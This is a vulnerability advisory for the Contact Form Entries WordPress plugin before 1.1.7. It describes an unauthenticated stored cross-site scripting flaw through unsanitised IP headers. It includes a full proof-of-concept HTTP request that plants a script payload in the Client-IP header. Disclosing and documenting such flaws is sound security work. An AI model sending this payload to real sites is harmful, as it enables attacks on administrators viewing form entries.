WordPress Plugin Vulnerabilities
Contact Form Entries < 1.1.7 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not validate, sanitise and escape the IP address retrieved via headers such as CLIENT-IP and X-FORWARDED-FOR, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against logged in admins viewing the created entry
Proof of Concept
POST /wp-json/contact-form-7/v1/contact-forms/1376/feedback HTTP/1.1 Accept: application/json, */*;q=0.1 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------9885500162977152723644841236 Content-Length: 963 Connection: close Client-IP: <script>alert(/XSS/)</script> Cookie: vx_user=61c2ecea43ad6164016458635903967 -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="_wpcf7" 1376 -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="_wpcf7_version" 5.5.3 -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="_wpcf7_locale" en_US -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="_wpcf7_unit_tag" wpcf7-f1376-p1701-o1 -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="_wpcf7_container_post" 1701 -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="_wpcf7_posted_data_hash" 3e8ce0f47face5a3318813e733c3c774 -----------------------------9885500162977152723644841236 Content-Disposition: form-data; name="text-42" Test -----------------------------9885500162977152723644841236--
Affects Plugins
Fixed in version 1.1.7
References
Classification
Miscellaneous
Original Researcher
Gaetano Perrone
Submitter
Gaetano Perrone
Verified
Yes
Timeline
Publicly Published
2021-01-05 (about 2 years ago)
Added
2021-12-22 (about 1 years ago)
Last Updated
2022-04-16 (about 9 months ago)